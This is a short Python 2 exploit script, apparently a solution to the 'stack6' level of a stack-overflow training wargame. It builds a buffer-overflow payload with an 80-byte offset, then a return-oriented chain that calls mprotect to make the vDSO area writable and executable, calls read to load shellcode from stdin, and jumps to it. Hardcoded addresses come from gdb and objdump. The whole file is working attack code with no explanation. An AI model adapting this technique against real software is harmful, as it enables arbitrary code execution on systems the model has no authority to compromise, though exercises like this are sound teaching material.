```python
import struct

def p(x):
        return struct.pack('<L', x)



# (gdb) p read
inpt = p(0xb7f53c00)
# (gdb) p mpro
mpro = p(0xb7f5efe0)
# objdump -d stack6 | grep -B3 "ret"
pop3 = p(0x8048576)
# (gdb) i proc m
vdso = p(0xb7fe2000)

# none  = 0x00
# read  = 0x01
# write = 0x02
# exec  = 0x04
# permissions = rad|write|exec
mprm = p(0x07)
# Allocate 64 bytes
msze = p(0x40)

# stdin
infd = p(0x00)
# Read 56 bytes - our shell is 55
insz = p(0x38)

# Offset to EIP
offset = 80

# Overflow to EIP
payload = "A"*offset

# Call mprotect to set VDSO area to RWX
#       - return to pop3 gadget
#       - args( addr, size, permissions )
payload += mpro
payload += pop3
payload += vdso
payload += msze
payload += mprm

# Call read to get shellcode
#       - return to pop3 gadget
#       - args( fd, addr, size )
payload += inpt
payload += pop3
payload += infd
payload += vdso
payload += insz

# Call the shellcode in VDSO
payload += vdso

# (python ~/exploit.py; python ~/inject.py; cat) | ./stack6
print payload
```